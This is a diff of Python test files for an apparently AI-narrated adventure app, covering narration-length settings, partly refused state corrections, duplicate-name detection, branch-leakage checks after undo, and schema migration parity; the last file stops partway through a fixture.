assert updated.json()["narration_length"] == "long"
|
||||
|
||||
|
||||
def test_a_length_the_builder_cannot_serve_is_refused(client):
|
||||
"""A closed set, because an unknown value would silently mean 'no effect'."""
|
||||
response = client.post("/api/adventures", json={
|
||||
"title": "Bad", "opening": "x", "narration_length": "epic"})
|
||||
assert response.status_code == 422
|
||||
|
||||
|
||||
def test_the_stored_prompt_carries_the_campaigns_own_range(client):
|
||||
"""End to end: two campaigns, two choices, two different prompts."""
|
||||
from sqlalchemy.orm import undefer
|
||||
|
||||
seen = {}
|
||||
for length in ("brief", "long"):
|
||||
campaign = _campaign(client, narration_length=length)
|
||||
ScriptedProvider.replies = ["The rain does not let up."]
|
||||
assert client.post(f"/api/adventures/{campaign['id']}/actions",
|
||||
json={"type": "do", "text": "look"}).status_code == 200
|
||||
with SessionLocal() as db:
|
||||
action = (
|
||||
db.query(models.Action)
|
||||
.filter(models.Action.adventure_id == campaign["id"],
|
||||
models.Action.type == "ai")
|
||||
.options(undefer(models.Action.context_snapshot))
|
||||
.order_by(models.Action.id.desc()).first()
|
||||
)
|
||||
hint = next(s for s in action.context_snapshot["sections"]
|
||||
if s["label"] == "length_hint")
|
||||
seen[length] = _numbers(hint["text"])[0]
|
||||
assert seen["brief"] < seen["long"], seen
|
||||
|
||||
|
||||
def test_the_choice_travels_in_the_bundle(client):
|
||||
campaign = _campaign(client, narration_length="long")
|
||||
exported = client.get(f"/api/adventures/{campaign['id']}/export").json()
|
||||
assert exported["narrationLength"] == "long"
|
||||
copy_id = client.post("/api/adventures/import", json=exported).json()["id"]
|
||||
assert client.get(f"/api/adventures/{copy_id}").json()["narration_length"] == "long"
|
||||
|
||||
|
||||
def test_a_bundle_naming_a_length_this_build_cannot_serve_drops_it(client):
|
||||
campaign = _campaign(client, narration_length="long")
|
||||
payload = client.get(f"/api/adventures/{campaign['id']}/export").json()
|
||||
payload["narrationLength"] = "cinematic"
|
||||
copy_id = client.post("/api/adventures/import", json=payload).json()["id"]
|
||||
# Empty rather than stored: a preference the builder ignores is
|
||||
# indistinguishable from the defect this milestone fixed.
|
||||
assert client.get(f"/api/adventures/{copy_id}").json()["narration_length"] == ""
|
||||
|
||||
|
||||
def test_an_older_bundle_with_no_length_imports_unchanged(client):
|
||||
campaign = _campaign(client, narration_length="long")
|
||||
payload = client.get(f"/api/adventures/{campaign['id']}/export").json()
|
||||
del payload["narrationLength"]
|
||||
copy_id = client.post("/api/adventures/import", json=payload).json()["id"]
|
||||
assert client.get(f"/api/adventures/{copy_id}").json()["narration_length"] == ""
|
||||
|
||||
|
||||
# ------------------- C04: a correction that is partly refused says so (M11-1)
|
||||
|
||||
def test_a_partly_refused_correction_reports_what_did_not_apply(client):
|
||||
"""The defect the identity diagnostic surfaced, as a regression.
|
||||
|
||||
A correction of two changes where one names a location that does not exist:
|
||||
the good one lands, the bad one does not, and **before M11 the answer was an
|
||||
unqualified 201**. The reader was told nothing, and went on believing they
|
||||
had set a scene they had not.
|
||||
|
||||
`validate.py` already said this must not happen — "what is never allowed is
|
||||
a rejected event mutating anything, or **a rejection being silent**" — and
|
||||
the refusal was recorded on the proposal for the audit trail. What was
|
||||
missing was telling the person who made the correction. Partial application
|
||||
itself is deliberate and is unchanged: losing three good changes to one typo
|
||||
would be worse.
|
||||
"""
|
||||
campaign = _campaign(client)
|
||||
response = client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [
|
||||
{"type": "create_entity", "entity": "mara",
|
||||
"entity_type": "character", "name": "Mara"},
|
||||
{"type": "set_scene", "summary": "In the hall.",
|
||||
"location": "nowhere", "present": ["mara"]},
|
||||
],
|
||||
"note": "one good, one bad",
|
||||
})
|
||||
assert response.status_code == 201, response.text[:300]
|
||||
body = response.json()
|
||||
|
||||
# The good change landed.
|
||||
assert "mara" in body["document"]["entities"]
|
||||
# The bad one did not, and the caller is told which and why.
|
||||
assert body["document"].get("scene") in ({}, None)
|
||||
assert len(body["refused"]) == 1, body["refused"]
|
||||
refusal = body["refused"][0]
|
||||
assert refusal["event"]["type"] == "set_scene"
|
||||
assert refusal["reason"] == "unknown_reference"
|
||||
assert "nowhere" in refusal["detail"]
|
||||
|
||||
|
||||
def test_a_correction_that_fully_applies_reports_nothing_refused(client):
|
||||
"""The control: `refused` is empty when nothing was refused."""
|
||||
campaign = _campaign(client)
|
||||
response = client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [{"type": "create_entity", "entity": "mara",
|
||||
"entity_type": "character", "name": "Mara"}],
|
||||
"note": "",
|
||||
})
|
||||
assert response.status_code == 201
|
||||
assert response.json()["refused"] == []
|
||||
|
||||
|
||||
def test_a_wholly_refused_correction_is_still_a_400(client):
|
||||
"""Unchanged: nothing applied is an error, not a success with a note."""
|
||||
campaign = _campaign(client)
|
||||
response = client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [{"type": "set_scene", "summary": "x", "location": "nowhere"}],
|
||||
"note": "",
|
||||
})
|
||||
assert response.status_code == 400
|
||||
assert "nowhere" in response.json()["detail"]
|
||||
|
||||
|
||||
def test_the_refusal_is_still_recorded_for_the_audit_trail(client):
|
||||
"""The half that already worked keeps working: §8's proposal record."""
|
||||
campaign = _campaign(client)
|
||||
client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [
|
||||
{"type": "create_entity", "entity": "mara",
|
||||
"entity_type": "character", "name": "Mara"},
|
||||
{"type": "set_scene", "summary": "In the hall.", "location": "nowhere"},
|
||||
],
|
||||
"note": "",
|
||||
})
|
||||
with SessionLocal() as db:
|
||||
# `detail` is deferred, so it is read inside the session — reading it
|
||||
# after the session closed is how the first version of this test failed.
|
||||
rows = [
|
||||
(p.status, repr(p.detail))
|
||||
for p in db.query(models.StateProposal).filter(
|
||||
models.StateProposal.adventure_id == campaign["id"]).all()
|
||||
]
|
||||
partial = [row for row in rows if row[0] == "partially_accepted"]
|
||||
assert partial, [row[0] for row in rows]
|
||||
# And the reason is on the record, not only the verdict.
|
||||
assert "nowhere" in partial[0][1]
|
||||
|
||||
|
||||
# --------------------------------- finding D: the structural fact to check first
|
||||
|
||||
def test_two_entities_may_still_share_a_display_name(client):
|
||||
"""Recorded, not fixed — and the distinction matters.
|
||||
|
||||
The finding says to check this first: the narrative state keys entities by
|
||||
the model-supplied id and `DUPLICATE_ENTITY` rejects only a repeated *key*,
|
||||
so two characters can be created with the same `name` and nothing says so.
|
||||
That is one of the finding's candidate failure modes.
|
||||
|
||||
It is **not** made an error here. Two people called Alice is an ordinary
|
||||
thing for a story to contain, and refusing it would refuse legitimate
|
||||
fiction to guard against a model mistake. What M11 adds instead is
|
||||
*detection*: `nmodel.duplicate_names` reports it, the identity diagnostic
|
||||
(`tools/m11_identity.py`) reads that report, and the reader's State panel
|
||||
can show it. This test pins the permissive behaviour so a later milestone
|
||||
changes it deliberately rather than by accident.
|
||||
"""
|
||||
campaign = _campaign(client)
|
||||
response = client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [
|
||||
{"type": "create_entity", "entity": "alice_1",
|
||||
"entity_type": "character", "name": "Alice"},
|
||||
{"type": "create_entity", "entity": "alice_2",
|
||||
"entity_type": "character", "name": "Alice"},
|
||||
],
|
||||
"note": "two people, one name",
|
||||
})
|
||||
assert response.status_code == 201, response.text[:300]
|
||||
document = client.get(f"/api/adventures/{campaign['id']}/state").json()["document"]
|
||||
assert set(document["entities"]) >= {"alice_1", "alice_2"}
|
||||
|
||||
|
||||
def test_the_state_reports_a_shared_display_name(client):
|
||||
"""M11 adds the detection the finding asks for, without adding a refusal."""
|
||||
campaign = _campaign(client)
|
||||
client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [
|
||||
{"type": "create_entity", "entity": "alice_1",
|
||||
"entity_type": "character", "name": "Alice"},
|
||||
{"type": "create_entity", "entity": "alice_2",
|
||||
"entity_type": "character", "name": "alice "},
|
||||
{"type": "create_entity", "entity": "roger",
|
||||
"entity_type": "character", "name": "Roger"},
|
||||
],
|
||||
"note": "",
|
||||
})
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, campaign["id"])
|
||||
clashes = nmodel.duplicate_names(adventure.narrative_state)
|
||||
# Case and surrounding space do not make two people different.
|
||||
assert clashes == {"alice": ["alice_1", "alice_2"]}
|
||||
|
||||
|
||||
def test_a_campaign_with_distinct_names_reports_nothing(client):
|
||||
campaign = _campaign(client)
|
||||
client.post(f"/api/adventures/{campaign['id']}/state/corrections", json={
|
||||
"events": [
|
||||
{"type": "create_entity", "entity": "a", "entity_type": "character",
|
||||
"name": "Alice"},
|
||||
{"type": "create_entity", "entity": "r", "entity_type": "character",
|
||||
"name": "Roger"},
|
||||
],
|
||||
"note": "",
|
||||
})
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, campaign["id"])
|
||||
assert nmodel.duplicate_names(adventure.narrative_state) == {}
|
||||
@@ -0,0 +1,417 @@
|
||||
"""M11 §13: E01-E04, all four at once, in one long campaign.
|
||||
|
||||
The E-series already has tests, and good ones — M6's corrective pass rewrote E03
|
||||
after an independent review found the first version passing while the defect was
|
||||
live. What none of them does is what the M11 brief asks for: exercise all four
|
||||
**together, in a single campaign, under realistic long-story conditions**, with
|
||||
state, memories, summaries, imported knowledge and a scene all live at once.
|
||||
|
||||
That matters because the four leaks share one mechanism — a head that moves and
|
||||
a lineage that decides what is still true — and a campaign that has only one of
|
||||
them cannot show the mechanism failing for one and holding for another. It also
|
||||
adds the dimension none of the earlier tests could have: M10's Scene Packet, the
|
||||
thing a future depiction would be built from, which has to answer for the active
|
||||
line exactly as the state does.
|
||||
|
||||
Four sentinels, one per class, each with a positive control on path A and a
|
||||
negative control on path B:
|
||||
|
||||
state a fact and a location established on the abandoned line
|
||||
memory a distinctive memory extracted from abandoned turns
|
||||
summary a summary **regenerated after the divergence** (M6-F1's shape)
|
||||
scene the location the abandoned line moved to, in the state *and* in
|
||||
the derived packet
|
||||
|
||||
python -m pytest tests/test_m11_leakage.py -v
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
|
||||
import pytest
|
||||
from fastapi import Depends
|
||||
from fastapi.testclient import TestClient
|
||||
|
||||
from app import auth, limits, memorybank, models, summaries
|
||||
from app.context import lineage
|
||||
from app.database import Base, SessionLocal, engine, get_db
|
||||
from app.knowledge import embeddings
|
||||
from app.main import app
|
||||
from app.routers import adventures
|
||||
|
||||
from fakes import ScriptedProvider, state_block
|
||||
|
||||
#: One per leak class, so a failure names which boundary broke.
|
||||
STATE_SENTINEL = "the-abbey-seal-was-broken"
|
||||
MEMORY_SENTINEL = "GRIMWALD-CONFESSED-8821"
|
||||
SUMMARY_SENTINEL = "ABANDONED-OATH-SWORN-4416"
|
||||
SCENE_SENTINEL = "old_abbey_crypt"
|
||||
|
||||
|
||||
class Summariser:
|
||||
"""Carries the summary forward and folds in new events, as a real one does.
|
||||
|
||||
Copied in behaviour from `test_context_memory.CarryingSummariser` — the M6
|
||||
corrective pass established that a summariser which *discards* its seed
|
||||
cannot show the E03 defect, because the defect is in what the seed contains.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.seeds: list[str] = []
|
||||
|
||||
async def complete(self, system, user, *, max_tokens=600):
|
||||
if "Current story summary:" not in user:
|
||||
found = [s for s in (MEMORY_SENTINEL, SUMMARY_SENTINEL) if s in user]
|
||||
if found:
|
||||
return "MEM[" + " ".join(found) + "]"
|
||||
return "MEM[the road, and nothing sworn]"
|
||||
current = user.split("Current story summary:\n", 1)[1].split("\n\nNew events")[0]
|
||||
events = user.split("New events since the last update:\n", 1)[1].split(
|
||||
"\n\nUpdated summary:")[0]
|
||||
self.seeds.append(current.strip())
|
||||
carried = "" if current.strip() == "(none yet)" else current.strip() + " "
|
||||
return (carried + events.strip().replace("\n", " "))[:2000]
|
||||
|
||||
async def embed(self, texts):
|
||||
out = []
|
||||
for text in texts:
|
||||
out.append([
|
||||
1.0,
|
||||
1.0 if MEMORY_SENTINEL in text or "confess" in text.lower() else 0.0,
|
||||
1.0 if "road" in text.lower() else 0.0,
|
||||
])
|
||||
return out
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def summariser(monkeypatch):
|
||||
made = Summariser()
|
||||
monkeypatch.setattr(memorybank, "summary_provider", lambda s: made)
|
||||
monkeypatch.setattr(memorybank, "embedding_provider", lambda s: made)
|
||||
return made
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def client(monkeypatch, summariser):
|
||||
Base.metadata.create_all(bind=engine)
|
||||
memorybank._vector_cache.clear()
|
||||
embeddings._cache.clear()
|
||||
setup = SessionLocal()
|
||||
user = models.User(is_guest=False, email="m11leak@example.com")
|
||||
setup.add(user)
|
||||
setup.flush()
|
||||
setup.add(models.Settings(
|
||||
user_id=user.id, model="test-model", embedding_model="embed-test",
|
||||
context_token_budget=6000, max_output_tokens=400, memory_top_k=4,
|
||||
))
|
||||
adventure = models.Adventure(
|
||||
user_id=user.id, title="Continuity", memory_bank_enabled=True,
|
||||
auto_summarize=True,
|
||||
campaign_canon={"rules": ["The dead do not return."]},
|
||||
)
|
||||
setup.add(adventure)
|
||||
setup.flush()
|
||||
setup.add(models.Action(adventure_id=adventure.id, type="start",
|
||||
text="Rain over Westhaven, and the abbey bell tolling."))
|
||||
setup.commit()
|
||||
adv_id, user_id = adventure.id, user.id
|
||||
setup.close()
|
||||
|
||||
monkeypatch.setattr(limits, "check_row_cap", lambda *a, **k: None)
|
||||
monkeypatch.setattr(adventures.turns, "OpenAICompatibleProvider", ScriptedProvider)
|
||||
app.dependency_overrides[auth.get_current_user] = (
|
||||
lambda db=Depends(get_db): db.get(models.User, user_id)
|
||||
)
|
||||
test_client = TestClient(app)
|
||||
test_client.adv_id = adv_id
|
||||
try:
|
||||
yield test_client
|
||||
finally:
|
||||
app.dependency_overrides.clear()
|
||||
adventures.turns._active_turns.clear()
|
||||
memorybank._vector_cache.clear()
|
||||
embeddings._cache.clear()
|
||||
Base.metadata.drop_all(bind=engine)
|
||||
|
||||
|
||||
# ----------------------------------------------------------------- helpers
|
||||
|
||||
def play(client, text, prose="The road bends on past the treeline.", events=None):
|
||||
ScriptedProvider.replies = [f"{prose}\n{state_block(events or [])}"]
|
||||
response = client.post(f"/api/adventures/{client.adv_id}/actions",
|
||||
json={"type": "do", "text": text})
|
||||
assert response.status_code == 200, response.text[:300]
|
||||
assert '"error"' not in response.text, response.text[:300]
|
||||
|
||||
|
||||
def report(client) -> dict:
|
||||
response = client.get(f"/api/adventures/{client.adv_id}/context")
|
||||
assert response.status_code == 200, response.text[:300]
|
||||
return response.json()
|
||||
|
||||
|
||||
def prompt_of(report_: dict) -> str:
|
||||
return "\n".join(section["text"] for section in report_["sections"])
|
||||
|
||||
|
||||
def state_of(client) -> dict:
|
||||
return client.get(f"/api/adventures/{client.adv_id}/state").json()["document"]
|
||||
|
||||
|
||||
def packet_of(client) -> dict:
|
||||
response = client.get(f"/api/adventures/{client.adv_id}/scene-packet")
|
||||
assert response.status_code == 200, response.text[:300]
|
||||
return response.json()
|
||||
|
||||
|
||||
def head_of(client):
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
return adventure.head_branch_id, adventure.head_depth
|
||||
|
||||
|
||||
def settle(client, rounds=8):
|
||||
"""Runs the derived pass until it has caught up, as a played campaign would.
|
||||
|
||||
`MAX_MEMORIES_PER_RUN` is 5, so one call settles at most five blocks — a cap
|
||||
that exists so an imported campaign does not do all its catch-up inside one
|
||||
turn. A test that calls it once and then asserts on the summary is asserting
|
||||
against a half-settled campaign, which is how the first version of this file
|
||||
failed: path A's later turns, the ones carrying the summary sentinel, had
|
||||
not been summarised yet.
|
||||
"""
|
||||
for _ in range(rounds):
|
||||
before = _settled_marks(client)
|
||||
asyncio.run(memorybank.run_post_turn(client.adv_id))
|
||||
if _settled_marks(client) == before:
|
||||
return
|
||||
|
||||
|
||||
def _settled_marks(client):
|
||||
with SessionLocal() as db:
|
||||
return (
|
||||
db.query(models.Memory).filter(
|
||||
models.Memory.adventure_id == client.adv_id).count(),
|
||||
db.query(models.Summary).filter(
|
||||
models.Summary.adventure_id == client.adv_id).count(),
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def diverged(client, summariser):
|
||||
"""One campaign: a long path A holding all four sentinels, then a path B.
|
||||
|
||||
Returns what the positive controls established on A, so the negative
|
||||
controls on B can be asserted against something rather than against nothing.
|
||||
"""
|
||||
# ---- Path A. Long enough that summaries and memories are real. ----
|
||||
play(client, "arrive", events=[
|
||||
{"type": "create_entity", "entity": "aldric", "entity_type": "character",
|
||||
"name": "Aldric"},
|
||||
{"type": "create_entity", "entity": "grimwald", "entity_type": "character",
|
||||
"name": "Grimwald"},
|
||||
{"type": "create_entity", "entity": "tavern", "entity_type": "location",
|
||||
"name": "The Crooked Lantern"},
|
||||
{"type": "create_entity", "entity": SCENE_SENTINEL,
|
||||
"entity_type": "location", "name": "The abbey crypt"},
|
||||
{"type": "set_scene", "summary": "Aldric and Grimwald take the corner table.",
|
||||
"location": "tavern", "present": ["aldric", "grimwald"]},
|
||||
])
|
||||
for i in range(10):
|
||||
play(client, f"a{i}", prose=f"They talk on into the evening. [{i}]")
|
||||
|
||||
# The four sentinels, established together on the line that will be left.
|
||||
play(client, "the confession", prose=(
|
||||
f"Grimwald says it plainly: {MEMORY_SENTINEL}. They swear the "
|
||||
f"{SUMMARY_SENTINEL} on it."
|
||||
), events=[
|
||||
{"type": "add_fact", "subject": "grimwald", "predicate": "confessed",
|
||||
"object": "aldric", "fact_id": STATE_SENTINEL},
|
||||
{"type": "set_current_location", "entity": "aldric",
|
||||
"location": SCENE_SENTINEL},
|
||||
{"type": "set_scene",
|
||||
"summary": "Aldric stands in the abbey crypt, the seal broken.",
|
||||
"location": SCENE_SENTINEL, "present": ["aldric"]},
|
||||
])
|
||||
for i in range(10):
|
||||
play(client, f"a2{i}", prose=(
|
||||
f"The crypt is cold, and the {SUMMARY_SENTINEL} still stands. [{i}]"))
|
||||
settle(client)
|
||||
|
||||
before = {
|
||||
"report": report(client),
|
||||
"state": state_of(client),
|
||||
"packet": packet_of(client),
|
||||
"head": head_of(client),
|
||||
}
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
row = summaries.current(db, adventure)
|
||||
before["summary_id"] = row.id if row else None
|
||||
before["summary_text"] = row.text if row else ""
|
||||
|
||||
# ---- Move the head below every sentinel, then diverge. ----
|
||||
while head_of(client)[1] > 11:
|
||||
assert client.post(f"/api/adventures/{client.adv_id}/undo").status_code == 200
|
||||
summariser.seeds.clear()
|
||||
|
||||
# ---- Path B. Far enough that a NEW summary is generated (M6-F1). ----
|
||||
play(client, "b-turn", prose="Aldric leaves the table and takes the dry road.",
|
||||
events=[
|
||||
{"type": "set_current_location", "entity": "aldric", "location": "tavern"},
|
||||
{"type": "set_scene", "summary": "Aldric alone on the road out of town.",
|
||||
"location": "tavern", "present": ["aldric"]},
|
||||
])
|
||||
for i in range(14):
|
||||
play(client, f"b{i}", prose=f"A dry road, nothing sworn, nothing confessed. [{i}]")
|
||||
settle(client)
|
||||
|
||||
return {"before": before, "after": {
|
||||
"report": report(client),
|
||||
"state": state_of(client),
|
||||
"packet": packet_of(client),
|
||||
"head": head_of(client),
|
||||
}}
|
||||
|
||||
|
||||
# ------------------------------------------------------- positive controls
|
||||
|
||||
def test_path_a_really_established_all_four(diverged):
|
||||
"""Without this, every assertion below proves only that nothing happened."""
|
||||
before = diverged["before"]
|
||||
prompt = prompt_of(before["report"])
|
||||
|
||||
facts = [f.get("id") for f in before["state"].get("facts", [])]
|
||||
assert STATE_SENTINEL in facts, "the state sentinel was never established"
|
||||
assert before["state"]["scene"]["location"] == SCENE_SENTINEL
|
||||
assert before["packet"]["location"]["key"] == SCENE_SENTINEL
|
||||
assert before["summary_id"] is not None, "no summary was generated on path A"
|
||||
assert SUMMARY_SENTINEL in before["summary_text"], (
|
||||
"the fixture did not get the sentinel into path A's summary")
|
||||
assert SUMMARY_SENTINEL in prompt, "path A's prompt did not carry its own summary"
|
||||
assert MEMORY_SENTINEL in prompt or any(
|
||||
MEMORY_SENTINEL in (m.get("text") or "")
|
||||
for m in (before["report"].get("memories") or {}).get("used", [])
|
||||
), "the memory sentinel never reached path A's prompt"
|
||||
|
||||
|
||||
# ------------------------------------------------------- E01: state
|
||||
|
||||
def test_e01_the_abandoned_fact_is_not_in_the_active_state(diverged):
|
||||
facts = [f.get("id") for f in diverged["after"]["state"].get("facts", [])]
|
||||
assert STATE_SENTINEL not in facts
|
||||
|
||||
|
||||
def test_e01_the_abandoned_fact_is_not_in_the_active_prompt(diverged):
|
||||
assert STATE_SENTINEL not in prompt_of(diverged["after"]["report"])
|
||||
|
||||
|
||||
# ------------------------------------------------------- E02: memory
|
||||
|
||||
def test_e02_the_abandoned_memory_does_not_enter_the_active_prompt(diverged):
|
||||
after = diverged["after"]["report"]
|
||||
assert MEMORY_SENTINEL not in prompt_of(after)
|
||||
used = (after.get("memories") or {}).get("used", [])
|
||||
assert not any(MEMORY_SENTINEL in (m.get("text") or "") for m in used)
|
||||
|
||||
|
||||
def test_e02_the_abandoned_memory_is_still_on_disk(client, diverged):
|
||||
"""Retained, not deleted — the story was left, not erased (ADR 012)."""
|
||||
with SessionLocal() as db:
|
||||
stored = db.query(models.Memory).filter(
|
||||
models.Memory.adventure_id == client.adv_id,
|
||||
models.Memory.text.like(f"%{MEMORY_SENTINEL}%"),
|
||||
).count()
|
||||
assert stored > 0, "the abandoned memory was destroyed rather than retained"
|
||||
|
||||
|
||||
# ------------------------------------------------------- E03: summary
|
||||
|
||||
def test_e03_a_new_summary_was_generated_on_the_new_line(client, diverged):
|
||||
"""M6-F1's shape: the test is worthless unless a regeneration happened."""
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
row = summaries.current(db, adventure)
|
||||
assert row is not None, "no summary is eligible on path B"
|
||||
assert row.id != diverged["before"]["summary_id"], (
|
||||
"path B reused path A's summary row rather than generating one")
|
||||
|
||||
|
||||
def test_e03_the_regenerated_summary_carries_no_abandoned_content(client, diverged):
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
row = summaries.current(db, adventure)
|
||||
assert SUMMARY_SENTINEL not in (row.text or "")
|
||||
assert MEMORY_SENTINEL not in (row.text or "")
|
||||
|
||||
|
||||
def test_e03_the_summariser_was_never_offered_the_abandoned_summary(summariser, diverged):
|
||||
"""The fix is at the input. A filter over the output would be a different bug."""
|
||||
assert summariser.seeds, "no summary was generated on path B"
|
||||
assert not any(SUMMARY_SENTINEL in seed for seed in summariser.seeds)
|
||||
|
||||
|
||||
def test_e03_no_abandoned_turn_is_on_the_active_lineage(client, diverged):
|
||||
with SessionLocal() as db:
|
||||
adventure = db.get(models.Adventure, client.adv_id)
|
||||
leaked = db.query(models.Action).filter(
|
||||
models.Action.adventure_id == client.adv_id,
|
||||
lineage.path_of(db, adventure).clause(models.Action),
|
||||
models.Action.text.like(f"%{SUMMARY_SENTINEL}%"),
|
||||
).count()
|
||||
assert leaked == 0, "the fixture left path-A story on path B's lineage"
|
||||
|
||||
|
||||
def test_e03_the_abandoned_summary_row_is_retained(client, diverged):
|
||||
with SessionLocal() as db:
|
||||
kept = db.query(models.Summary).filter(
|
||||
models.Summary.adventure_id == client.adv_id,
|
||||
models.Summary.text.like(f"%{SUMMARY_SENTINEL}%"),
|
||||
).count()
|
||||
assert kept > 0, "the abandoned summary was deleted rather than retired"
|
||||
|
||||
|
||||
# ------------------------------------------------------- E04: scene
|
||||
|
||||
def test_e04_the_current_scene_is_the_active_lines_scene(diverged):
|
||||
"""The acceptance scenario, exactly: the discarded future moved to the abbey."""
|
||||
scene = diverged["after"]["state"]["scene"]
|
||||
assert scene["location"] == "tavern"
|
||||
assert scene["location"] != SCENE_SENTINEL
|
||||
|
||||
|
||||
def test_e04_the_protagonists_location_followed_the_active_line(diverged):
|
||||
entities = diverged["after"]["state"].get("entities") or {}
|
||||
assert (entities.get("aldric") or {}).get("location") != SCENE_SENTINEL
|
||||
|
||||
|
||||
def test_e04_the_derived_scene_packet_shows_the_active_line_only(diverged):
|
||||
"""M10's packet, which is what a future depiction would be built from.
|
||||
|
||||
The packet is derived from the authoritative state on read, so this cannot
|
||||
fail while the state above passes — which is the point. It is asserted
|
||||
anyway because the packet is a *new* surface since E04 was written, and a
|
||||
later change that gave it a store of its own would fail here.
|
||||
"""
|
||||
packet = diverged["after"]["packet"]
|
||||
assert packet["location"]["key"] == "tavern"
|
||||
assert SCENE_SENTINEL not in repr(packet)
|
||||
assert packet["scene_id"] != diverged["before"]["packet"]["scene_id"]
|
||||
|
||||
|
||||
def test_e04_the_abandoned_scene_is_still_retained_at_its_own_position(client, diverged):
|
||||
"""Retained history keeps its scene; it simply is not current."""
|
||||
from sqlalchemy.orm import undefer
|
||||
|
||||
with SessionLocal() as db:
|
||||
rows = (
|
||||
db.query(models.Action)
|
||||
.filter(models.Action.adventure_id == client.adv_id)
|
||||
.options(undefer(models.Action.narrative_state_after))
|
||||
.all()
|
||||
)
|
||||
kept = [
|
||||
r for r in rows
|
||||
if ((r.narrative_state_after or {}).get("scene") or {}).get("location")
|
||||
== SCENE_SENTINEL
|
||||
]
|
||||
assert kept, "the abandoned line's scene was destroyed rather than retained"
|
||||
@@ -0,0 +1,293 @@
|
||||
"""M11 §17: a fresh install and an upgraded database must be the same product.
|
||||
|
||||
M10 found the defect this file makes permanent. It shipped a `CREATE INDEX`
|
||||
migration for an index `create_all` already built from the column, so an
|
||||
*upgraded* database ended up with two indexes and a fresh one with a single
|
||||
index — two schemas differing by which path the file took, which is the thing a
|
||||
migration exists to prevent. Nothing found it except comparing the two.
|
||||
|
||||
So the comparison is the test, and it is written to be general rather than about
|
||||
`visual_profiles`: every table, every column with its type and nullability,
|
||||
every index and its uniqueness, every foreign key, and the version stamp. A
|
||||
future migration that diverges the two paths fails here whatever it is about.
|
||||
|
||||
The second half is the upgrade itself: a database built by the **previous
|
||||
supported build** — M10's schema, version 92 — opened by this one, and then
|
||||
played, exported and imported, because a migration that leaves a campaign
|
||||
unplayable has not worked.
|
||||
|
||||
python -m pytest tests/test_m11_migration.py -v
|
||||
"""
|
||||
|
||||
import json
|
||||
import sqlite3
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
from sqlalchemy import create_engine, inspect, text
|
||||
from sqlalchemy.orm import sessionmaker
|
||||
|
||||
from app import backup, migrations, models
|
||||
from app.database import Base
|
||||
|
||||
BACKEND = Path(__file__).resolve().parent.parent
|
||||
|
||||
#: The schema M10 shipped: everything this build has, minus what M11 added.
|
||||
#: Expressed as the inverse of M11's own migrations, which is what
|
||||
#: `schema_rewind` does for the suite generally — repeated here as data so this
|
||||
#: file states plainly what "the previous supported build" means.
|
||||
M10_VERSION = 92
|
||||
M11_ADDITIONS = (("adventures", "narration_length"),)
|
||||
|
||||
|
||||
def _describe(engine) -> dict:
|
||||
"""Everything about a schema that two databases could disagree about."""
|
||||
inspector = inspect(engine)
|
||||
out: dict = {"tables": {}}
|
||||
for table in sorted(inspector.get_table_names()):
|
||||
if table.startswith("sqlite_"):
|
||||
continue
|
||||
columns = {
|
||||
c["name"]: {
|
||||
"type": str(c["type"]),
|
||||
"nullable": bool(c["nullable"]),
|
||||
# `default` is rendered differently by different paths (a Python
|
||||
# default never reaches the DDL), so it is deliberately not
|
||||
# compared; `nullable` and type are what a query can depend on.
|
||||
}
|
||||
for c in inspector.get_columns(table)
|
||||
}
|
||||
indexes = {
|
||||
i["name"]: {"columns": list(i["column_names"]),
|
||||
"unique": bool(i.get("unique"))}
|
||||
for i in inspector.get_indexes(table)
|
||||
}
|
||||
foreign_keys = sorted(
|
||||
(tuple(fk["constrained_columns"]), fk["referred_table"],
|
||||
tuple(fk["referred_columns"]))
|
||||
for fk in inspector.get_foreign_keys(table)
|
||||
)
|
||||
out["tables"][table] = {
|
||||
"columns": columns, "indexes": indexes, "foreign_keys": foreign_keys,
|
||||
"primary_key": inspector.get_pk_constraint(table).get(
|
||||
"constrained_columns", []),
|
||||
}
|
||||
with engine.begin() as conn:
|
||||
out["version"] = conn.execute(text("PRAGMA user_version")).scalar()
|
||||
return out
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def fresh(tmp_path):
|
||||
"""A database as a new installation creates one."""
|
||||
path = tmp_path / "fresh.db"
|
||||
engine = create_engine(f"sqlite:///{path}")
|
||||
migrations.bootstrap(engine)
|
||||
yield path, engine
|
||||
engine.dispose()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def upgraded(tmp_path):
|
||||
"""A database as the previous supported build left it, then opened by this one.
|
||||
|
||||
Built by creating the current schema, removing what M11 added, and stamping
|
||||
the version M10 ended on — which is what an M10-era file *is*, since M10
|
||||
added no migration of its own.
|
||||
"""
|
||||
path = tmp_path / "upgraded.db"
|
||||
older = create_engine(f"sqlite:///{path}")
|
||||
Base.metadata.create_all(bind=older)
|
||||
with sessionmaker(bind=older)() as db:
|
||||
# Owned by the implicit local user, which is the row `auth.local_user`
|
||||
# resolves to — an email-less, non-guest user. A campaign owned by
|
||||
# nobody would not be listed by the server, and the test would be
|
||||
# measuring ownership rather than migration.
|
||||
owner = models.User(is_guest=False, email=None)
|
||||
db.add(owner)
|
||||
db.flush()
|
||||
adventure = models.Adventure(title="An M10 campaign", user_id=owner.id)
|
||||
db.add(adventure)
|
||||
db.flush()
|
||||
